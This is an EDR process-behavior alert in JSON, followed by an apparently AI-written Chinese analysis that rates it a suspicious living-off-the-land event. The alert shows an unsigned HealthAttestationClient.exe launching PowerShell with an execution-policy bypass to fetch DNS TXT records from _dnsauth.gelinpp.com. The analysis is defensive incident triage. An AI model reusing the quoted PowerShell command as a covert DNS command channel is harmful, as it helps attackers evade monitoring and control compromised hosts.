请基于以下json数据,给我分析一下这个行为是否存在威胁: { "alarm_info": { "behavior_alarm": { "AIanalysis": 0, "author": "defend", "label": "执行.利用命令和脚本解释器.利用PowerShell-T1059.001", "level": 3, "rule_id": "wop0060008", "target": "self" }, "executable_alarm": { "rule_id": "", "target": "", "template_id": "" } }, "dispose_info_list": [ { "dispose": "automatic_release", "object": "", "result": "", "type": "event" }, { "dispose": "release", "object": "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "result": "unprocessed", "type": "process" }, { "dispose": "release", "object": "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "result": "unprocessed", "type": "file" } ], "magic": "antiyedr", "operate": "create", "process_info_parent": { "account": "Administrator", "active_mode": 2, "family_list": [ { "param": "C:\Windows\Explorer.EXE", "path": "C:\Windows\explorer.exe", "pid": 5408, "ppid": 5340 }, { "param": "", "path": "C:\Windows\System32\userinit.exe", "pid": 5340, "ppid": 1008 }, { "param": "winlogon.exe", "path": "C:\Windows\System32\winlogon.exe", "pid": 1008, "ppid": 788 } ], "file_info": { "basic_info": { "arch": "AMD64", "certificate_info": [], "compile_time": 1770806663, "compiler_pack": "Compiler/Microsoft.VISUAL_C@18", "copyright_info": { "ver_company": "Microsoft Corporation", "ver_file_description": "HealthAttestationClient", "ver_internal_name": "", "ver_legal_copyright": "© 2024 Microsoft Corporation. All rights reserved.", "ver_origina_file_name": "", "ver_product_name": "HealthAttestationClient", "ver_product_version": "1.0.26100.0", "ver_software_version": "0.1.0.0" }, "format": "BinExecute/Microsoft.EXE[:X64]", "is_system_file": 0, "package_name": "", "package_type": 0, "sfx_info": "", "sha1": "E71264E6B892D0A61B81E08BE4E544F429A6BC45", "sha256": "E566B1C4FE1596708B900A887631C0775AF06B39BD168FC96140909AB5919A07", "size": 459776, "symbol_path": "self_task_monitor.pdb" }, "create_time": 1776671561, "detect_info": { "detect_author": "", "detect_id": "", "detect_module": "", "fsign": "9FB6FEDB677A7B6C590880B870284043FCD5C55D7F83146E", "rule_state": "", "state": "unknown", "virus_name": "" }, "entity_exist": true, "file_attr": "", "file_location": 2, "file_ownership": 999, "is_hidden": false, "md5": "7F83146EDF60C129AA054ADCFCD5C55D", "modify_time": 1776671561, "path": "C:\Windows\System32\HealthAttestationClient\HealthAttestationClient.exe", "vendor_ownership": "HealthAttestationClient" }, "is_local": true, "param": ""C:\Windows\System32\HealthAttestationClient\HealthAttestationClient.exe" ", "pid": 13892, "priviledge": "medium", "ptime": 1779261623 }, "process_info_self": { "account": "Administrator", "active_mode": 2, "family_list": [ { "param": ""C:\Windows\System32\HealthAttestationClient\HealthAttestationClient.exe" ", "path": "C:\Windows\System32\HealthAttestationClient\HealthAttestationClient.exe", "pid": 13892, "ppid": 5408 }, { "param": "C:\Windows\Explorer.EXE", "path": "C:\Windows\explorer.exe", "pid": 5408, "ppid": 5340 }, { "param": "", "path": "C:\Windows\System32\userinit.exe", "pid": 5340, "ppid": 1008 }, { "param": "winlogon.exe", "path": "C:\Windows\System32\winlogon.exe", "pid": 1008, "ppid": 788 } ], "file_info": { "basic_info": { "arch": "AMD64", "certificate_info": [], "compile_time": 2128232725, "compiler_pack": "", "copyright_info": { "ver_company": "Microsoft Corporation", "ver_file_description": "Windows PowerShell", "ver_internal_name": "POWERSHELL", "ver_legal_copyright": "© Microsoft Corporation. All rights reserved.", "ver_origina_file_name": "PowerShell.EXE.MUI", "ver_product_name": "Microsoft® Windows® Operating System", "ver_product_version": "10.0.19041.4522", "ver_software_version": "10.0.19041.546" }, "format": "BinExecute/Microsoft.EXE[:X64]", "is_system_file": 1, "package_name": "", "package_type": 0, "sfx_info": "", "sha1": "F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054", "sha256": "9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F", "size": 452608, "symbol_path": "powershell.pdb" }, "create_time": 1659691640, "detect_info": { "detect_author": "", "detect_id": "", "detect_module": "", "fsign": "000000000000000000000000000000000000000000000000", "rule_state": "", "state": "white", "virus_name": "" }, "entity_exist": true, "file_attr": "rw", "file_location": 2, "file_ownership": 0, "is_hidden": false, "md5": "04029E121A0CFA5991749937DD22A1D9", "modify_time": 1659691640, "path": "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "vendor_ownership": "Microsoft® Windows® Operating System" }, "is_local": true, "param": ""powershell.exe" -NoProfile -ExecutionPolicy ByPass -Command "chcp 65001; $domain=\"dnsauth.gelinpp.com\"; $DnsServers = '1.1.1.1'\r\ntry {\r\n ipconfig /flushdns | Out-Null\r\n $txtRecords = Resolve-DnsName -Name $domain -Type TXT -Server $DnsServers -ErrorAction Stop\r\n foreach ($record in $txtRecords) {\r\n $record.Strings | ForEach-Object { Write-Output $ }\r\n }\r\n exit 0\r\n} catch {\r\n exit 1\r\n}"", "pid": 6944, "priviledge": "medium", "ptime": 1779267344 }, "time": 1779267345, "type": "process_behavior", "uuid": "6A19F1ABFE6EB852BDF7DD99D4B15C16", "ver": "V3.0", "guid": "17f45e65563517e9b5165bc9175e99a0" }
AVL Code 生成于 2026/6/16 21:52:39| 字段 | 值 |
|---|---|
| 告警规则 | wop0060008 — 执行.利用命令和脚本解释器.利用PowerShell-T1059.001 |
| 严重等级 | 3(中高危) |
| 告警类型 | 进程行为告警 |
| 处置状态 | automatic_release(自动放过) |
1winlogon.exe (pid:788)2 └─ userinit.exe (pid:1008)3 └─ explorer.exe (pid:5408)4 └─ HealthAttestationClient.exe (pid:13892, 父进程)5 └─ powershell.exe (pid:6944, 告警进程)
关键时间线:
HealthAttestationClient.exe 启动时间:1779261623powershell.exe 启动时间:17792673441779267345(几乎与 PowerShell 启动同时)| 属性 | 值 |
|---|---|
| 路径 | C:\Windows\System32\HealthAttestationClient\HealthAttestationClient.exe |
| 数字签名 | 无证书信息(certificate_info: []) |
| SHA256 | E566B1C4FE1596708B900A887631C0775AF06B39BD168FC96140909AB5919A07 |
| 编译时间 | 2026-02-06 左右(Unix 1770806663) |
| 编译工具 | Microsoft Visual C++ 18 |
| 检测状态 | unknown(未知) |
| 厂商归属 | "HealthAttestationClient" |
| 系统文件标志 | 非系统文件(is_system_file: 0) |
⚠️ 异常点:
System32 子目录但未被标记为系统文件执行命令(已解码):
1powershell.exe -NoProfile -ExecutionPolicy ByPass -Command "2chcp 65001;3$domain='_dnsauth.gelinpp.com';4$DnsServers = '1.1.1.1'5try {6 ipconfig /flushdns | Out-Null7 $txtRecords = Resolve-DnsName -Name $domain -Type TXT -Server $DnsServers -ErrorAction Stop8 foreach ($record in $txtRecords) {9 $record.Strings | ForEach-Object { Write-Output $_ }10 }11 exit 012} catch {13 exit 114}"
| 属性 | 值 |
|---|---|
| 路径 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| SHA256 | 9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F |
| 检测状态 | white(白文件)— 微软官方 PowerShell |
| 系统文件标志 | 是(is_system_file: 1) |
| 权限等级 | medium(中等完整性) |
PowerShell 执行的具体操作:
chcp 65001 — 切换控制台代码页为 UTF-8ipconfig /flushdns — 清除 DNS 缓存(隐蔽性操作,避免本地缓存干扰)Resolve-DnsName -Name _dnsauth.gelinpp.com -Type TXT -Server 1.1.1.1 — 向 Cloudflare DNS (1.1.1.1) 查询域名的 TXT 记录TXT 查询的威胁含义:
_dnsauth.gelinpp.com 是典型的 DNS TXT 记录隐蔽通道(DNS-over-TXT) 模式_dnsauth 子域名前缀伪装成"DNS 认证验证"用途(如 Let's Encrypt 的 DNS-01 验证也使用 _acme-challenge 前缀),具有欺骗性| 维度 | 评估 |
|---|---|
| 告警规则 | ✅ 命中 MITRE ATT&CK T1059.001(PowerShell),规则准确 |
| 父进程合法性 | ⚠️ 可疑 — HealthAttestationClient.exe 无签名、非系统文件、检测状态 unknown |
| PowerShell 调用参数 | ⚠️ 典型恶意模式 — -NoProfile -ExecutionPolicy ByPass 绕过执行策略 |
| 命令行为 | 🔴 高可疑 — DNS TXT 记录查询,典型的隐蔽 C2 信道手法 |
| 域名 | 🔴 可疑 — gelinpp.com 非知名服务商,_dnsauth 前缀伪装 |
| 处置结果 | ⚠️ 已自动放过(automatic_release),未进行阻断 |
此行为具有较高的威胁可能性,判定为:可疑恶意活动(高置信度)
具体来说,这是一起典型的 Living-off-the-Land (LotL) 攻击行为:
HealthAttestationClient.exe(路径:C:\Windows\System32\HealthAttestationClient\)HealthAttestationClient.exe 样本(SHA256: E566B1C4FE1596708B900A887631C0775AF06B39BD168FC96140909AB5919A07)进行逆向分析gelinpp.com 的历史威胁情报automatic_release 处置策略建议调整为 block 或 terminate